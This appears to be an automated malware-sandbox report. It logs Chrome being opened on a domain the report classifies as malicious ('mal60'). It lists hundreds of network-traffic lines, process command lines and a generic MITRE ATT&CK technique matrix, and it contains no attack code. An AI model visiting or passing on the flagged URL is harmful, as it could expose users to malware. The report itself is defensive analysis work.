Source: unknownNetwork traffic detected: HTTP traffic on port 51033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50717
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50716
Source: unknownNetwork traffic detected: HTTP traffic on port 51159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50719
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50727
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50720
Source: unknownNetwork traffic detected: HTTP traffic on port 51021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
Source: unknownNetwork traffic detected: HTTP traffic on port 51115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 50685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50779
Source: unknownNetwork traffic detected: HTTP traffic on port 50911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50778
Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
Source: unknownNetwork traffic detected: HTTP traffic on port 51057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
Source: unknownNetwork traffic detected: HTTP traffic on port 51139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50785
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 50955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
Source: unknownNetwork traffic detected: HTTP traffic on port 51069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
Source: unknownNetwork traffic detected: HTTP traffic on port 51119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
Source: unknownNetwork traffic detected: HTTP traffic on port 50639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50826 version: TLS 1.2
Source: classification engineClassification label: mal60.win@18/691@32/9
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://wkybcnfuqpgjx.ltd/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
